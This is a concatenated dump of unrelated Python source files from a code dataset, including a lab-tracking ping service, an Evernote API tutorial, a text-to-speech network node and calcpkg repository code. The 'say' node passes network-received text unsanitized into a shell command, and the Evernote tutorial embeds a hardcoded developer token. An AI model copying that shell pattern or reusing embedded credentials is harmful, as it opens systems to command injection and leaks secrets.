NSEM.Src.Planewave_xy_1Dprimary(rxList, freq)
for freq in np.logspace(4, -2, 13)
]
# Survey MT
survey = NSEM.Survey(srcList)
# Setup the problem object
problem = NSEM.Problem3D_ePrimSec(M, sigma=sig, sigmaPrimary=sigBG)
problem.pair(survey)
problem.Solver = Solver
# Calculate the data
fields = problem.fields()
dataVec = survey.eval(fields)
# Add uncertainty to the data - 10% standard
    # deviation and 0 floor
dataVec.standard_deviation.fromvec(
np.ones_like(simpeg.mkvc(dataVec)) * 0.1
)
dataVec.floor.fromvec(
np.zeros_like(simpeg.mkvc(dataVec))
)
# Add plots
if plotIt:
# Plot the data
# On and off diagonal (on left and right axis, respectively)
fig, axes = plt.subplots(2, 1, figsize=(7, 5))
plt.subplots_adjust(right=0.8)
[(ax.invert_xaxis(), ax.set_xscale('log')) for ax in axes]
ax_r, ax_p = axes
ax_r.set_yscale('log')
ax_r.set_ylabel('Apparent resistivity [xy-yx]')
ax_r_on = ax_r.twinx()
ax_r_on.set_yscale('log')
ax_r_on.set_ylabel('Apparent resistivity [xx-yy]')
ax_p.set_ylabel('Apparent phase')
ax_p.set_xlabel('Frequency [Hz]')
# Start plotting
ax_r = dataVec.plot_app_res(
np.array([-200, 0]),
components=['xy', 'yx'], ax=ax_r, errorbars=True)
ax_r_on = dataVec.plot_app_res(
np.array([-200, 0]),
components=['xx', 'yy'], ax=ax_r_on, errorbars=True)
ax_p = dataVec.plot_app_phs(
np.array([-200, 0]),
components=['xx', 'xy', 'yx', 'yy'], ax=ax_p, errorbars=True)
ax_p.legend(bbox_to_anchor=(1.05, 1), loc=2)
if __name__ == '__main__':
do_plots = True
run(do_plots)
if do_plots:
plt.show()
| mit | -775,327,344,103,404,200 | 28.511628 | 116 | 0.566851 | false | 2.90389 | false | false | false |
abztrakt/labtracker | client_scripts/ping_service.py | 1 | 2296 | #
# A ping service to be 'compiled' into an exe-file with py2exe.
# To install this service, run 'LabtrackerPingService.py install' at command prompt
# 'Then LabtrackerPingService.py start'
#
#
# Need to download pywin32 in order to import these modules
import win32serviceutil
import win32service
import win32event
import win32evtlogutil
import win32api
import win32con
import time
import sys,os
import urllib2
import urllib
import getpass
import servicemanager
DEBUG = True
LABTRACKER_URL = "labtracker.eplt.washington.edu"
if DEBUG:
LABTRACKER_URL = "web16.eplt.washington.edu:8000"
def get_mac():
    # Windows: parse `ipconfig /all` output for the adapter's physical (MAC) address
    mac = None
    if sys.platform == 'win32':
for line in os.popen("ipconfig /all"):
if line.lstrip().startswith('Physical Address'):
mac = line.split(':')[1].strip().replace('-',':')
break
return mac
def get_data(status):
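    """Build the POST body: the current process's user name plus the given status."""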
# get user info from machine
user = getpass.getuser()
data = urllib.urlencode({'user': user, 'status': status})
return data
class MyService(win32serviceutil.ServiceFramework):
_svc_name_ = "LabtrackerService"
_svc_display_name_ = "Labtracker Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.isAlive = True
def SvcStop(self):
servicemanager.LogInfoMsg("ping service - Stopping")
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.isAlive = False
def SvcDoRun(self):
servicemanager.LogInfoMsg("ping service - Start")
mac = get_mac()
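        # Main service loop: POST a 'ping' with the current user name and this
        # machine's MAC address to the Labtracker server every ~10 seconds.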
while self.isAlive:
servicemanager.LogInfoMsg("ping service - Ping")
req= urllib2.Request(url="http://%s/tracker/ping/%s/" %(LABTRACKER_URL,mac),data=get_data('ping'))
urllib2.urlopen(req)
win32api.SleepEx(10000,True)
servicemanager.LogInfoMsg("ping service - Stopped")
def ctrlHandler(ctrlType):
return True
if __name__ == '__main__':
# Note that this code will not be run in the 'frozen' exe-file!!!
win32api.SetConsoleCtrlHandler(ctrlHandler,True)
win32serviceutil.HandleCommandLine(MyService)
| apache-2.0 | -5,519,914,994,963,934,000 | 25.662651 | 111 | 0.642422 | false | 3.615748 | false | false | false |
deniskolokol/kinect_log_visualizer | utils.py | 1 | 4602 | import os
import sys
import time
import random
import datetime
from bisect import bisect
from termcolor import colored, cprint
from string import ascii_lowercase, digits, punctuation
import settings
CHARS = ascii_lowercase + digits + punctuation
def relpath(*x):
return os.path.join(settings.BASE_DIR, *x)
def weighted_choice(choices):
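    """Pick a value from (value, weight) pairs with probability proportional to its weight."""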
values, weights = zip(*choices)
total = 0
cum_weights = []
for w in weights:
total += w
cum_weights.append(total)
x = random.random() * total
i = bisect(cum_weights, x)
return values[i]
def shoot(line, color=None, output=sys.stdout, attrs=None):
ln = line.lower()
try:
line = line.rstrip().encode('utf-8')
except UnicodeDecodeError:
pass
if color:
cprint(line, color, attrs=attrs, file=output)
return
if ('error' in ln) or ('exception' in ln) or ('err' in ln):
cprint(line, 'red', file=output)
elif 'debug' in ln:
cprint(line, 'white', attrs=['bold'], file=output)
elif ('warning' in ln) or ('warn' in ln) or ('profile' in ln):
cprint(line, 'white', attrs=['bold'], file=output)
elif ('info' in ln) or ('inf' in ln):
cprint(line, 'white', attrs=['dark'], file=output)
else:
cprint(line, 'white', file=output)
def shoot_file(fname=None, color=None):
exclude_files = ['osceleton.trace']
if fname is None:
fname = random.choice([
f for f in os.listdir(settings.BASE_DIR)
if os.path.isfile(f) and f not in exclude_files])
fname = relpath(fname)
if color is None:
# do not allow big files to be displayed in color
statinfo = os.stat(fname)
if statinfo.st_size <= 10000:
color = random.choice(['blue', 'white', 'red'])
else:
color = 'white'
with open(fname, 'r') as f:
count = 0
for ln in f.readlines():
count += 1
ln = "%-3d %s" % (count, ln)
shoot(ln, color=color)
time.sleep(0.05)
shoot('\n')
f.close()
def spinner():
while True:
for cursor in '|/-\\':
yield cursor
def spinning_cursor(wait=10, output=sys.stdout):
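    """Animate a spinning cursor on `output` for roughly `wait` seconds."""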
spinner_ = spinner()
for _ in range(int(wait/0.1)):
output.write(spinner_.next())
output.flush()
time.sleep(0.1)
output.write('\b')
def table_row(row, width):
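    """Render one table row as fixed-width, left-justified columns."""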
return "".join(str(word).ljust(width) for word in row)
def get_stat(labels, num_col):
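    """Generate random rows (label + numeric columns) for the fake stats table."""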
data = []
for _ in range(random.randint(5, 20)):
data.append(
[random.choice(labels)] \
+ [random.randint(0, 2000) for i in range(num_col-2)]
+ [random.random()*random.randint(0, 100)]
)
col_width = max(len(str(word)) for row in data for word in row) + 2 # padding
data = sorted(data, key=lambda x: x[0], reverse=random.choice([True, False]))
return col_width, [table_row(rw, col_width) for rw in data]
def shoot_table():
shoot("=" * 80)
header = ['#', 'LC', 'CCN', 'Dict#4', '-->']
labels = ['inf', 'err', 'err cri', 'warn', 'generic']
width, stat = get_stat(labels, num_col=len(header))
shoot(table_row(header, width), color='white', attrs=['dark'])
for row in stat:
shoot(row)
time.sleep(0.1)
time.sleep(random.random()*2)
shoot('\n\n')
def rand_string(size=12):
"""
    Generates a quasi-unique sequence from random letters, digits and punctuation.
"""
return ''.join(random.choice(CHARS) for x in range(size))
def wait_key():
"""
Wait for a key press on the console and return it.
"""
result = None
if os.name == 'nt':
import msvcrt
result = msvcrt.getch()
else:
import termios
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
try:
result = sys.stdin.read(1)
except IOError:
pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
return result
def log_post(msg, output=sys.stdout):
if msg.lower().startswith('debug'):
symbol = '>'
elif msg.lower().startswith('error'):
symbol = 'x'
elif msg.lower().startswith('warning'):
symbol = '!'
else:
symbol = '.'
shoot('[%s] %s: %s' % (
symbol, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), msg),
output=output)
| mit | -6,743,224,113,621,126,000 | 26.070588 | 81 | 0.569752 | false | 3.449775 | false | false | false |
suqi/everhelper | sample_code/tutorial.py | 1 | 2550 | # -*- coding:utf-8 -*-
"""
Test code for getting started quickly with the Evernote API.
Note: the official Evernote Python library targets py2 and its py3 branch has not
been updated for a long time, so py2 is used consistently here.
Personally, the best learning resource is the sublime-evernote plugin
https://github.com/bordaigorl/sublime-evernote/blob/master/sublime_evernote.py
because it is a full-featured plugin (including create/read/update/delete).
Another good resource is the sample code in Evernote's official SDK
https://github.com/evernote/evernote-sdk-python/blob/master/sample/client/EDAMTest.py
There are also a few tools written by Chinese community members
https://github.com/littlecodersh/EasierLife
The Evernote API is built on the Thrift framework, so the API has the same
interface definitions in every language.
"""
from evernote.api.client import EvernoteClient
from evernote.edam import type
import evernote.edam.type.ttypes as Types
import evernote.edam.notestore.NoteStore as NoteStore
# This is a sandbox token for testing; you need to request your own:
# https://sandbox.evernote.com/api/DeveloperToken.action
dev_token = "S=s1:U=92e22:E=15e5ac1167d:C=157030fe988:P=1cd:A=en-devtoken:V=2:H=1ef28ef900ebae2ba1d1385bffbb6635"
client = EvernoteClient(token=dev_token)
userStore = client.get_user_store()
print userStore.token
user = userStore.getUser()
# This note_store is the most important data API
note_store = client.get_note_store()
for nb in note_store.listNotebooks():
print nb.name
n = type.ttypes.Note()
n.title = "First evernote using api"
n.content = u"哈哈wahahahaha"  # it seems Chinese text needs explicit encoding
n.content = "haha"
note_store.createNote(n)
note = Types.Note()
note.title = "Test note from EDAMTest.py"
note.content = '<?xml version="1.0" encoding="UTF-8"?>'
note.content += '<!DOCTYPE en-note SYSTEM ' \
'"http://xml.evernote.com/pub/enml2.dtd">'
note.content += '<en-note>Here is the Evernote logo:<br/>'
note.content += '</en-note>'
created_note = note_store.createNote(note)
books = note_store.listNotebooks()
bid = books[1].guid  # grab the second notebook (the first, test notebook has no data)
search = {'notebookGuid': bid}
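# findNotesMetadata(filter, offset, maxNotes, resultSpec): fetch metadata for up
# to 10 notes in that notebook, including only titles and notebook GUIDs.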
results = note_store.findNotesMetadata(
NoteStore.NoteFilter(**search),
None,
10,
NoteStore.NotesMetadataResultSpec(
includeTitle=True, includeNotebookGuid=True)
)
print results.notes[0].title
# NoteMetadata does not include the note body; fetch the full note with getNote() below
haha = results.notes[0].guid # 'e3570976-3dbd-439e-84fa-98d8d2aae28e'
n = note_store.getNote(haha, True, False, False, False)
print n.created
print n.resources
print n.tagNames
print n.contentHash
| mit | -4,224,595,090,090,930,000 | 26.974026 | 113 | 0.75766 | false | 2.120079 | true | false | false |
AutorestCI/azure-sdk-for-python | azure-mgmt-batchai/azure/mgmt/batchai/models/batch_ai_management_client_enums.py | 1 | 1839 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class CachingType(Enum):
none = "none"
readonly = "readonly"
readwrite = "readwrite"
class StorageAccountType(Enum):
standard_lrs = "Standard_LRS"
premium_lrs = "Premium_LRS"
class FileServerType(Enum):
nfs = "nfs"
glusterfs = "glusterfs"
class FileServerProvisioningState(Enum):
creating = "creating"
updating = "updating"
deleting = "deleting"
succeeded = "succeeded"
failed = "failed"
class VmPriority(Enum):
dedicated = "dedicated"
lowpriority = "lowpriority"
class DeallocationOption(Enum):
requeue = "requeue"
terminate = "terminate"
waitforjobcompletion = "waitforjobcompletion"
unknown = "unknown"
class ProvisioningState(Enum):
creating = "creating"
succeeded = "succeeded"
failed = "failed"
deleting = "deleting"
class AllocationState(Enum):
steady = "steady"
resizing = "resizing"
class OutputType(Enum):
model = "model"
logs = "logs"
summary = "summary"
custom = "custom"
class ToolType(Enum):
cntk = "cntk"
tensorflow = "tensorflow"
caffe = "caffe"
caffe2 = "caffe2"
chainer = "chainer"
custom = "custom"
class ExecutionState(Enum):
queued = "queued"
running = "running"
terminating = "terminating"
succeeded = "succeeded"
failed = "failed"
| mit | 7,489,821,665,362,570,000 | 18.357895 | 76 | 0.611746 | false | 3.937901 | false | false | false |
z25/ZOCPApps | zsay/zsayNode.py | 1 | 1853 | #!/usr/bin/python
'''
Use subprocess to trigger the 'say' command to do text-to-speech.
Works on OSX out of the box.
On Ubuntu do apt-get install gnustep-gui-runtime
'''
# IMPORTS
import sys
import subprocess
from zocp import ZOCP
def map(value, istart, istop, ostart, ostop):
return ostart + (ostop - ostart) * ((value - istart) / (istop - istart))
def clamp(n, minn, maxn):
if n < minn:
return minn
elif n > maxn:
return maxn
else:
return n
class SayNode(ZOCP):
# Constructor
def __init__(self, nodename=""):
self.nodename = nodename
super(SayNode, self).__init__()
# INIT DMX
# ZOCP STUFF
self.set_name(self.nodename)
# Register everything ..
print("###########")
self.register_string("text to say", "bla", 'srw')
subprocess.call('say "init"', shell=True)
self.start()
def on_peer_signaled(self, peer, name, data, *args, **kwargs):
print("#### on_peer_signaled")
if self._running and peer:
for sensor in data[2]:
if(sensor):
self.receive_value(sensor)
def on_modified(self, peer, name, data, *args, **kwargs):
print("#### on_modified")
if self._running and peer:
for key in data:
if 'value' in data[key]:
self.receive_value(key)
def receive_value(self, key):
new_value = self.capability[key]['value']
if(type(new_value)== str):
toSay = "say "+new_value
subprocess.call(toSay, shell=True)
if __name__ == '__main__':
#zl = logging.getLogger("zocp")
#zl.setLevel(logging.DEBUG)
z = SayNode("SAYnode")
z.run()
print("FINISH")
| gpl-3.0 | 6,593,179,945,152,202,000 | 20.546512 | 76 | 0.529951 | false | 3.529524 | false | false | false |
coyotevz/nbx | nbx/models/fiscal.py | 1 | 1166 | # -*- coding: utf-8 -*-
from nbx.models import db
class FiscalData(db.Model):
__tablename__ = 'fiscal_data'
FISCAL_CONSUMIDOR_FINAL = 'CONSUMIDOR FINAL'
FISCAL_RESPONSABLE_INSCRIPTO = 'RESPONSABLE INSCRIPTO'
FISCAL_EXCENTO = 'EXCENTO'
FISCAL_MONOTRIBUTO = 'MONOTRIBUTO'
_fiscal_types = {
FISCAL_CONSUMIDOR_FINAL: 'Consumidor Final',
FISCAL_RESPONSABLE_INSCRIPTO: 'Responsable Inscripto',
FISCAL_EXCENTO: 'Excento',
FISCAL_MONOTRIBUTO: 'Monotributo',
}
id = db.Column(db.Integer, primary_key=True)
cuit = db.Column(db.Unicode(13))
fiscal_type = db.Column(db.Enum(*_fiscal_types.keys(), name='fiscal_type'),
default=FISCAL_CONSUMIDOR_FINAL)
iibb = db.Column(db.Unicode, nullable=True)
@property
def needs_cuit(self):
return self.fiscal_type not in (self.FISCAL_CONSUMIDOR_FINAL,)
@property
def type(self):
return self._fiscal_types.get(self.fiscal_type)
def __repr__(self):
return "<FiscalData '{} {}' of '{}'>".format(
self.type,
self.cuit,
self.entity.full_name,
)
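# Illustrative check (hypothetical values, no database session required):
#   fd = FiscalData(cuit=u'20-12345678-3',
#                   fiscal_type=FiscalData.FISCAL_MONOTRIBUTO)
#   fd.needs_cuit   # True  -- only CONSUMIDOR FINAL may omit the CUIT
#   fd.type         # u'Monotributo'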
| gpl-3.0 | 152,274,601,453,172,130 | 28.15 | 79 | 0.611492 | false | 3.005155 | false | false | false |
seewindcn/tortoisehg | src/ext/dulwich/greenthreads.py | 1 | 4958 | # greenthreads.py -- Utility module for querying an ObjectStore with gevent
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Fabien Boucher <[email protected]>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Utility module for querying an ObjectStore with gevent."""
import gevent
from gevent import pool
from dulwich.objects import (
Commit,
Tag,
)
from dulwich.object_store import (
MissingObjectFinder,
_collect_filetree_revs,
ObjectStoreIterator,
)
def _split_commits_and_tags(obj_store, lst,
ignore_unknown=False, pool=None):
"""Split object id list into two list with commit SHA1s and tag SHA1s.
Same implementation as object_store._split_commits_and_tags
except we use gevent to parallelize object retrieval.
"""
commits = set()
tags = set()
def find_commit_type(sha):
try:
o = obj_store[sha]
except KeyError:
if not ignore_unknown:
raise
else:
if isinstance(o, Commit):
commits.add(sha)
elif isinstance(o, Tag):
tags.add(sha)
commits.add(o.object[1])
else:
raise KeyError('Not a commit or a tag: %s' % sha)
jobs = [pool.spawn(find_commit_type, s) for s in lst]
gevent.joinall(jobs)
return (commits, tags)
class GreenThreadsMissingObjectFinder(MissingObjectFinder):
"""Find the objects missing from another object store.
Same implementation as object_store.MissingObjectFinder
except we use gevent to parallelize object retrieval.
"""
def __init__(self, object_store, haves, wants,
progress=None, get_tagged=None,
concurrency=1, get_parents=None):
def collect_tree_sha(sha):
self.sha_done.add(sha)
cmt = object_store[sha]
_collect_filetree_revs(object_store, cmt.tree, self.sha_done)
self.object_store = object_store
p = pool.Pool(size=concurrency)
have_commits, have_tags = \
_split_commits_and_tags(object_store, haves,
True, p)
want_commits, want_tags = \
_split_commits_and_tags(object_store, wants,
False, p)
all_ancestors = object_store._collect_ancestors(have_commits)[0]
missing_commits, common_commits = \
object_store._collect_ancestors(want_commits, all_ancestors)
self.sha_done = set()
jobs = [p.spawn(collect_tree_sha, c) for c in common_commits]
gevent.joinall(jobs)
for t in have_tags:
self.sha_done.add(t)
missing_tags = want_tags.difference(have_tags)
wants = missing_commits.union(missing_tags)
self.objects_to_send = set([(w, None, False) for w in wants])
if progress is None:
self.progress = lambda x: None
else:
self.progress = progress
self._tagged = get_tagged and get_tagged() or {}
class GreenThreadsObjectStoreIterator(ObjectStoreIterator):
"""ObjectIterator that works on top of an ObjectStore.
Same implementation as object_store.ObjectStoreIterator
except we use gevent to parallelize object retrieval.
"""
def __init__(self, store, shas, finder, concurrency=1):
self.finder = finder
self.p = pool.Pool(size=concurrency)
super(GreenThreadsObjectStoreIterator, self).__init__(store, shas)
def retrieve(self, args):
sha, path = args
return self.store[sha], path
def __iter__(self):
for sha, path in self.p.imap_unordered(self.retrieve,
self.itershas()):
yield sha, path
def __len__(self):
if len(self._shas) > 0:
return len(self._shas)
while len(self.finder.objects_to_send):
jobs = []
for _ in range(0, len(self.finder.objects_to_send)):
jobs.append(self.p.spawn(self.finder.next))
gevent.joinall(jobs)
for j in jobs:
if j.value is not None:
self._shas.append(j.value)
return len(self._shas)
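# Rough usage sketch (the repository path is a placeholder); it only shows how
# the finder defined above is constructed -- haves/wants are commit SHAs and
# `concurrency` bounds the size of the gevent pool.
#   from dulwich.repo import Repo
#   repo = Repo('/path/to/repo')
#   finder = GreenThreadsMissingObjectFinder(repo.object_store, haves=[],
#                                            wants=[repo.head()], concurrency=4)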
| gpl-2.0 | 8,698,830,080,980,818,000 | 34.163121 | 75 | 0.616176 | false | 3.988737 | false | false | false |
hickerson/bbn | fable/fable_sources/libtbx/command_line/line_count.py | 1 | 1442 | from __future__ import division
import sys, os
import re
import libtbx.load_env
boost_python_include_pat = re.compile(r"#include\s*<boost(?:/|_)python");
def run(modules):
directory_paths = [ libtbx.env.dist_path(m) for m in modules ]
line_counts_in_files_of_type = {}
for d in directory_paths:
for root, dirs, files in os.walk(d):
for f in files:
if f.startswith('.'): continue
_, ext = os.path.splitext(f)
if ext in ('.pyo', '.pyc'): continue
boost_python_binding = False
n_lines = 0
with open(os.path.join(root,f)) as fo:
for li in fo:
n_lines += 1
if (not boost_python_binding
and boost_python_include_pat.search(li)):
boost_python_binding = True
if boost_python_binding:
file_type = "Boost.Python"
elif not ext:
file_type = "unknown"
else:
file_type = ext[1:]
line_counts_in_files_of_type.setdefault(file_type, []).append(n_lines)
print "Lines of code in %s" % ', '.join(modules)
print "%-15s%8s" % ('extension', '#lines')
output = []
for file_type, line_counts in line_counts_in_files_of_type.iteritems():
cnt = sum(line_counts)
output.append((cnt, "%-15s%8d" % (file_type, cnt)))
output.sort(reverse=True)
output = [ entry[1] for entry in output ]
print '\n'.join(output)
if __name__ == '__main__':
run(sys.argv[1:])
| mit | -1,620,334,639,011,736,800 | 31.772727 | 78 | 0.582524 | false | 3.277273 | false | false | false |
shawncaojob/LC | PY/459_repeated_substring_pattern.py | 1 | 1188 | # 459. Repeated Substring Pattern
# Difficulty: Easy
# Given a non-empty string check if it can be constructed by taking a substring of it and appending multiple copies of the substring together. You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.
#
# Example 1:
# Input: "abab"
#
# Output: True
#
# Explanation: It's the substring "ab" twice.
# Example 2:
# Input: "aba"
#
# Output: False
# Example 3:
# Input: "abcabcabcabc"
#
# Output: True
#
# Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
# 2017.05.24
class Solution(object):
def repeatedSubstringPattern(self, s):
"""
:type s: str
:rtype: bool
"""
n = len(s)
for size in xrange(1, n // 2 + 1):
if n % size != 0: continue
i = 0
while (i + 2 * size) <= n and s[i:(i+size)] == s[(i+size):(i+2*size)]:
i = i + size
if i + size == n: return True
return False
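# Quick sanity check (not part of the original solution) of the examples above:
if __name__ == "__main__":
    s = Solution()
    print s.repeatedSubstringPattern("abab")          # True
    print s.repeatedSubstringPattern("aba")           # False
    print s.repeatedSubstringPattern("abcabcabcabc")  # True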
| gpl-3.0 | -8,715,548,885,708,875,000 | 26.627907 | 255 | 0.610269 | false | 3.423631 | false | false | false |
TC01/calcpkg | calcrepo/repo.py | 1 | 6492 | import copy
import os
import tarfile
import urllib2
import zipfile
from calcrepo import index
from calcrepo import output
from calcrepo import util
class CalcRepository:
"""A class for adding new calcpkg repositories"""
def __init__(self, name, url):
self.name = name
self.url = url
self.output = output.CalcpkgOutput(True, False)
self.index = index.Index(self)
self.searchString = ""
self.category = ""
self.extension = ""
self.math = False
self.game = False
self.searchFiles = False
self.downloadDir = os.path.join(os.path.expanduser("~"), "Downloads", "")
self.data = None
def __repr__(self):
return self.name + " at " + self.url
def __str__(self):
return self.name + " at " + self.url
def setRepoData(self, searchString, category="", extension="", math=False, game=False, searchFiles=False):
"""Call this function with all the settings to use for future operations on a repository, must be called FIRST"""
self.searchString = searchString
self.category = category
self.math = math
self.game = game
self.searchFiles = searchFiles
self.extension = extension
def setOutputObject(self, newOutput=output.CalcpkgOutput(True, True)):
"""Set an object where all output from calcpkg will be redirected to for this repository"""
self.output = newOutput
def searchHierarchy(self, fparent='/'):
return self.index.searchHierarchy(fparent)
def searchIndex(self, printData=True):
"""Search the index with all the repo's specified parameters"""
backupValue = copy.deepcopy(self.output.printData)
self.output.printData = printData
self.data = self.index.search(self.searchString, self.category, self.math, self.game, self.searchFiles, self.extension)
self.output.printData = backupValue
return self.data
def countIndex(self):
"""A wrapper for the count function in calcrepo.index; count using specified parameters"""
self.data = self.index.count(self.searchString, self.category, self.math, self.game, self.searchFiles, self.extension)
def getDownloadUrls(self):
"""Return a list of the urls to download from"""
data = self.searchIndex(False)
fileUrls = []
for datum in data:
fileUrl = self.formatDownloadUrl(datum[0])
fileUrls.append(fileUrl)
return fileUrls
def getFileInfos(self):
"""Return a list of FileInfo objects"""
data = self.searchIndex(False)
self.data = data
self.printd(" ")
fileInfos = []
for datum in data:
try:
fileInfo = self.getFileInfo(datum[0], datum[1])
fileInfos.append(fileInfo)
except NotImplementedError:
self.printd("Error: the info command is not supported for " + self.name + ".")
return []
return fileInfos
def downloadFiles(self, prompt=True, extract=False):
"""Download files from the repository"""
#First, get the download urls
data = self.data
downloadUrls = self.getDownloadUrls()
#Then, confirm the user wants to do this
if prompt:
confirm = raw_input("Download files [Y/N]? ")
if confirm.lower() != 'y':
self.printd("Operation aborted by user input")
return
#Now, if they still do, do all this stuff:
counter = -1
for datum in data:
counter += 1
try:
download = downloadUrls[counter]
except:
pass
# Download the file; fix our user agent
self.printd("Downloading " + datum[0] + " from " + download)
headers = { 'User-Agent' : 'calcpkg/2.0' }
request = urllib2.Request(download, None, headers)
fileData = urllib2.urlopen(request).read()
# Now, process the downloaded file
dowName = datum[0]
# Use a helper function to remove /pub, /files
dowName = util.removeRootFromName(dowName)
dowName = dowName[1:]
dowName = dowName.replace('/', '-')
dowName = self.downloadDir + dowName
try:
downloaded = open(dowName, 'wb')
except:
os.remove(dowName)
downloaded.write(fileData)
downloaded.close()
self.printd("Download complete! Wrote file " + dowName + "\n")
#Extract them if told to do so
if extract:
extractType = ""
if '.zip' in dowName:
extractType = "zip"
elif '.tar' in dowName:
extractType = "tar"
specType = ""
if '.bz2' in dowName:
specType = ":bz2"
elif ".gz" in dowName:
specType = ":gz"
elif ".tgz" in dowName:
extractType = "tar"
specType = ":gz"
if extractType != "":
self.printd("Extracting file " + dowName + ", creating directory for extracted files")
dirName, a, ending = dowName.partition('.')
dirName = dirName + '-' + ending
try:
os.mkdir(dirName)
except:
pass
if extractType == "zip":
archive = zipfile.ZipFile(dowName, 'r')
elif extractType == "tar":
archive = tarfile.open(dowName, "r" + specType)
else:
self.printd("An unknown error has occured!")
return
archive.extractall(dirName)
self.printd("All files in archive extracted to " + dirName)
os.remove(dowName)
self.printd("The archive file " + dowName + " has been deleted!\n")
def getFileInfo(self):
"""Return a list of FileInfo objects"""
raise NotImplementedError
def formatDownloadUrl(self, url):
"""Format a repository path to be a real, valid download link"""
raise NotImplementedError
def updateRepoIndexes(self, verbose=False):
"""Update the local copies of the repository's master index"""
raise NotImplementedError
def printd(self, message):
"""Output function for repository to specific output location"""
if self.output != None:
print >> self.output, message
def downloadFileFromUrl(self, url):
"""Given a URL, download the specified file"""
fullurl = self.baseUrl + url
try:
urlobj = urllib2.urlopen(fullurl)
contents = urlobj.read()
except urllib2.HTTPError, e:
self.printd("HTTP error:", e.code, url)
return None
except urllib2.URLError, e:
self.printd("URL error:", e.code, url)
return None
self.printd("Fetched '%s' (size %d bytes)" % (fullurl, len(contents)))
return contents
def openIndex(self, filename, description):
"""Attempt to delete and recreate an index, returns open file object or None."""
try:
os.remove(filename)
self.printd(" Deleted old " + description)
except:
self.printd(" No " + description + " found")
# Now, attempt to open a new index
try:
files = open(filename, 'wt')
except:
self.printd("Error: Unable to create file " + filename + " in current folder. Quitting.")
return None
return files
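# ---------------------------------------------------------------------------
# Sketch of a concrete repository (not part of calcpkg): real backends are
# expected to fill in the NotImplementedError hooks above. The class, URL and
# search term below are placeholders.
#   class ExampleRepository(CalcRepository):
#       def formatDownloadUrl(self, url):
#           return "http://www.example.org" + url
#       def updateRepoIndexes(self, verbose=False):
#           self.printd("nothing to update in this sketch")
#   repo = ExampleRepository("example", "http://www.example.org")
#   repo.setRepoData("fractal", game=True)
#   print(repo.getDownloadUrls())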
| mit | -8,259,769,547,867,269,000 | 29.336449 | 121 | 0.676217 | false | 3.29878 | false | false | false |
slarosa/QGIS | python/plugins/sextante/otb/OTBUtils.py | 3 | 5178 | # -*- coding: utf-8 -*-
"""
***************************************************************************
OTBUtils.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.core import QgsApplication
import subprocess
from sextante.core.SextanteConfig import SextanteConfig
from sextante.core.SextanteLog import SextanteLog
from sextante.core.SextanteUtils import SextanteUtils
class OTBUtils:
OTB_FOLDER = "OTB_FOLDER"
OTB_LIB_FOLDER = "OTB_LIB_FOLDER"
OTB_SRTM_FOLDER = "OTB_SRTM_FOLDER"
OTB_GEOID_FILE = "OTB_GEOID_FILE"
@staticmethod
def otbPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_FOLDER)
if folder == None:
folder = ""
#try to configure the path automatically
if SextanteUtils.isMac():
testfolder = os.path.join(str(QgsApplication.prefixPath()), "bin")
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
else:
testfolder = "/usr/local/bin"
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
elif SextanteUtils.isWindows():
testfolder = os.path.dirname(str(QgsApplication.prefixPath()))
testfolder = os.path.dirname(testfolder)
testfolder = os.path.join(testfolder, "bin")
path = os.path.join(testfolder, "otbcli.bat")
if os.path.exists(path):
folder = testfolder
else:
testfolder = "/usr/bin"
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
return folder
@staticmethod
def otbLibPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_LIB_FOLDER)
if folder == None:
folder =""
#try to configure the path automatically
if SextanteUtils.isMac():
testfolder = os.path.join(str(QgsApplication.prefixPath()), "lib/otb/applications")
if os.path.exists(testfolder):
folder = testfolder
else:
testfolder = "/usr/local/lib/otb/applications"
if os.path.exists(testfolder):
folder = testfolder
elif SextanteUtils.isWindows():
testfolder = os.path.dirname(str(QgsApplication.prefixPath()))
testfolder = os.path.join(testfolder, "orfeotoolbox")
testfolder = os.path.join(testfolder, "applications")
if os.path.exists(testfolder):
folder = testfolder
else:
testfolder = "/usr/lib/otb/applications"
if os.path.exists(testfolder):
folder = testfolder
return folder
@staticmethod
def otbSRTMPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_SRTM_FOLDER)
if folder == None:
folder =""
return folder
@staticmethod
def otbGeoidPath():
filepath = SextanteConfig.getSetting(OTBUtils.OTB_GEOID_FILE)
if filepath == None:
filepath =""
return filepath
@staticmethod
def otbDescriptionPath():
return os.path.join(os.path.dirname(__file__), "description")
